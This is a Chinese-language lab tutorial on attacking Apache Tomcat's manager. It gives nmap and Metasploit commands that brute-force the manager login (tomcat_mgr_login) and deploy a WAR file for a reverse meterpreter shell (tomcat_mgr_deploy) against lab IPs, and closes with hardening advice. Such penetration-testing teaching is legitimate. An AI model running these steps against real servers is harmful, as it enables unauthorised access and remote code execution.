6-26漏洞利用-tomcat管理密码破解

tomcat介绍

Tomcat服务器是一个免费的开放源代码的WEB应用服务器，这里的服务器指的是中间键，类似于iis、apache，这些中间键的web容器，属于轻量级应用服务器，在中小型系统和并发访问用户不是很多的场合下被普遍使用，是开发和调式JSP程序的首选。iis是开发asp的首选，apache是开发php的首选。默认情况下，8180端口是tomcat管理的HTTP的端口

点击tomcat manager

会让我们输入对应的账号密码，输出或者点取消，会返回401，表示我们未认证

探测目标tomcat

使用nmap -sV -p 8180 IP地址 探测目标tomcat版本信息

nmap -sV -p 8180 192.168.1.105
1

现在我们已经知道版本，而且管理界面需要输入对应的用户名密码登录

msf破解tomcat密码

msf下的auxiliary/scanner/http/tomcat_mgr_login模块来对tomcat管理登录密码进行破解

msfconsole
use auxiliary/scanner/http/tomcat_mgr_login
show options
1
2
3

set rhosts 192.168.42.137
set rport 8180
run
1
2
3

当我们得知密码的时候，我们可以进行登录验证

发现可以上传war文件

msf利用tomcat管理

在msf下可以使用use multi/http/tomcat_mgr_deploy模块利用tomcat upload功能反弹shell。

它的原理是上传一个war文件，在war文件执行对应的脚本，执行payload的内容，这个时候，就会执行反弹

use exploit/multi/http/tomcat_mgr_deploy
show options
1
2

set rhosts 192.168.42.137
set rport 8180
run
1
2
3

我们管理tomcat上传deploy的war文件，并反弹回meterpreter，这就是反弹shell的原理

修改tomcat密码，为一个复杂的密码，使得不太容易被破解，以及设置对应的阈值